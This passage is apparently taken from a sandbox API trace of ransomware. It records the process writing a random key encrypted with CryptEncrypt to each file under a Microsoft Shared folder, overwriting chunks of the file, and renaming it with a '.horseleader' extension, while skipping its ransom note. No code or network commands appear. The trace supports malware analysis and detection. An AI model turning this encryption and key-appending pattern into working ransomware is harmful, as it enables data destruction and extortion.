nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.656] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb0c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0245.656] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.656] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.656] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.657] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x16180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.657] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.657] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.657] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.657] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.658] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.658] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.658] CloseHandle (hObject=0x158) returned 1 [0245.658] GetProcessHeap () returned 0x780000 [0245.658] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.658] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL.horseleader") returned 84 [0245.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.dll.horseleader")) returned 1 [0245.660] GetProcessHeap () returned 0x780000 [0245.660] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.660] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85f12000, ftCreationTime.dwHighDateTime=0x1c9a11f, ftLastAccessTime.dwLowDateTime=0x69a83910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x85f12000, ftLastWriteTime.dwHighDateTime=0x1c9a11f, nFileSizeHigh=0x0, nFileSizeLow=0x120eb8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="METCONV.TXT", cAlternateFileName="")) returned 1 [0245.660] lstrcmpiW (lpString1="METCONV.TXT", lpString2="Windows") returned -1 [0245.660] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 72 [0245.660] StrStrIW (lpFirst="METCONV.TXT", lpSrch=".horseleader") returned 0x0 [0245.660] lstrcmpW (lpString1="METCONV.TXT", 
lpString2="#Decrypt#.txt") returned 1 [0245.660] lstrcmpW (lpString1="METCONV.TXT", lpString2="_uninstalling_.png") returned 1 [0245.660] lstrlenW (lpString=".testttjffg") returned 11 [0245.660] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT", lpSrch=".testttjffg") returned 0x0 [0245.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 72 [0245.662] StrStrW (lpFirst="METCONV.TXT", lpSrch=".txt") returned 0x0 [0245.662] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1183416) returned 1 [0245.662] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.662] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.665] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.665] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.667] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8df5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.667] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.669] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.669] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.669] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x11beb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.669] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.675] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.675] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.675] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.676] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.676] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.676] CloseHandle (hObject=0x158) returned 1 [0245.676] GetProcessHeap () returned 0x780000 [0245.676] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.676] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.horseleader") returned 84 [0245.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.horseleader")) returned 1 [0245.677] GetProcessHeap () returned 0x780000 [0245.677] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.677] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802a9400, ftCreationTime.dwHighDateTime=0x1caad0b, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x802a9400, ftLastWriteTime.dwHighDateTime=0x1caad0b, nFileSizeHigh=0x0, nFileSizeLow=0x59180, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MOFL.DLL", cAlternateFileName="")) returned 1 [0245.677] lstrcmpiW (lpString1="MOFL.DLL", lpString2="Windows") returned -1 [0245.677] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL") returned 69 [0245.677] StrStrIW (lpFirst="MOFL.DLL", lpSrch=".horseleader") returned 0x0 [0245.677] lstrcmpW (lpString1="MOFL.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.677] lstrcmpW (lpString1="MOFL.DLL", lpString2="_uninstalling_.png") returned 1 [0245.677] lstrlenW (lpString=".testttjffg") returned 11 [0245.677] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL", lpSrch=".testttjffg") returned 0x0 [0245.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.678] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.679] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL") returned 69 [0245.679] StrStrW (lpFirst="MOFL.DLL", lpSrch=".txt") returned 0x0 [0245.679] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=364928) returned 1 [0245.679] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.679] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.683] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.683] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.683] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2a0c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.683] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.685] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.685] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.685] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x54180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.685] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.687] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.687] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.687] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.687] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.688] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.688] CloseHandle (hObject=0x158) returned 1 [0245.688] GetProcessHeap () returned 0x780000 [0245.688] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.688] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL.horseleader") returned 81 [0245.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MOFL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mofl.dll.horseleader")) returned 1 [0245.689] GetProcessHeap () returned 0x780000 [0245.689] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.689] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab68100, ftCreationTime.dwHighDateTime=0x1cac9a5, ftLastAccessTime.dwLowDateTime=0x5943a0f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab68100, ftLastWriteTime.dwHighDateTime=0x1cac9a5, nFileSizeHigh=0x0, nFileSizeLow=0x3574, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSTAG.TLB", 
cAlternateFileName="")) returned 1 [0245.689] lstrcmpiW (lpString1="MSTAG.TLB", lpString2="Windows") returned -1 [0245.689] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB") returned 70 [0245.689] StrStrIW (lpFirst="MSTAG.TLB", lpSrch=".horseleader") returned 0x0 [0245.689] lstrcmpW (lpString1="MSTAG.TLB", lpString2="#Decrypt#.txt") returned 1 [0245.689] lstrcmpW (lpString1="MSTAG.TLB", lpString2="_uninstalling_.png") returned 1 [0245.689] lstrlenW (lpString=".testttjffg") returned 11 [0245.689] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB", lpSrch=".testttjffg") returned 0x0 [0245.690] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.690] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.690] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB") returned 70 [0245.692] StrStrW (lpFirst="MSTAG.TLB", lpSrch=".txt") returned 0x0 [0245.692] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13684) returned 1 [0245.692] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3574, lpOverlapped=0x0) returned 1 [0245.695] SetFilePointerEx (in: 
hFile=0x158, liDistanceToMove=0xffffca8c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.695] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3574, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3574, lpOverlapped=0x0) returned 1 [0245.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.695] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.695] CloseHandle (hObject=0x158) returned 1 [0245.696] GetProcessHeap () returned 0x780000 [0245.696] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.696] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB.horseleader") returned 82 [0245.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb.horseleader")) returned 1 [0245.697] GetProcessHeap () returned 0x780000 [0245.697] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.697] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0x3d80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SmartTagInstall.exe", cAlternateFileName="SMARTT~1.EXE")) returned 1 [0245.697] lstrcmpiW (lpString1="SmartTagInstall.exe", lpString2="Windows") returned -1 [0245.697] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe") returned 80 [0245.697] StrStrIW (lpFirst="SmartTagInstall.exe", lpSrch=".horseleader") returned 0x0 [0245.697] lstrcmpW (lpString1="SmartTagInstall.exe", lpString2="#Decrypt#.txt") returned 1 [0245.697] lstrcmpW (lpString1="SmartTagInstall.exe", lpString2="_uninstalling_.png") returned 1 [0245.697] lstrlenW (lpString=".testttjffg") returned 11 [0245.697] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe", lpSrch=".testttjffg") returned 0x0 [0245.697] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.697] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 
[0245.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe") returned 80 [0245.699] StrStrW (lpFirst="SmartTagInstall.exe", lpSrch=".txt") returned 0x0 [0245.699] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15744) returned 1 [0245.699] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3d80, lpOverlapped=0x0) returned 1 [0245.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc280, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.702] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3d80, lpOverlapped=0x0) returned 1 [0245.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.702] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.702] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.702] CloseHandle (hObject=0x158) returned 1 [0245.703] GetProcessHeap () returned 0x780000 [0245.703] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.703] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe.horseleader") returned 92 [0245.703] MoveFileW 
